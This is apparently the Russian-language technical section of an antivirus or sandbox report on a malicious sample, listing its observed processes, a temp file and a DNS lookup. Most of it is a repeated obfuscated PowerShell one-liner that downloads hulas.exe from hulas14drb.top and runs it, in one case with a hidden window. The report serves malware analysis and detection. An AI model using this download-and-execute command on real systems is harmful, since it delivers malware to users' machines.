Техническая информация
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -c $sdtisadqqw=('%TEMP%\hulas.exe');(N^ew-Obj^ect net.^Webclient).('Down'+'loadfi'+'le').invoke('ht'+'tp://hulas14drb.top/madonna/',$sdtisadqqw);Invoke-Item($sdtisadqqw)
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1364
- %TEMP%\1382122.cvr
- DNS ASK hu###14drb.top
- '<SYSTEM32>\cmd.exe' /c p^ow^ershell -c $sdtisadqqw=('%TEMP%\hulas.exe');(N^ew-Obj^ect net.^Webclient).('Down'+'loadfi'+'le').invoke('ht'+'tp://hulas14drb.top/madonna/',$sdtisadqqw);Invoke-Item($sdtisadqqw)' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $sdtisadqqw=('%TEMP%\hulas.exe');(New-Object net.Webclient).('Down'+'loadfi'+'le').invoke('ht'+'tp://hulas14drb.top/madonna/',$sdtisadqqw);Invoke-Item($sdtisadqqw)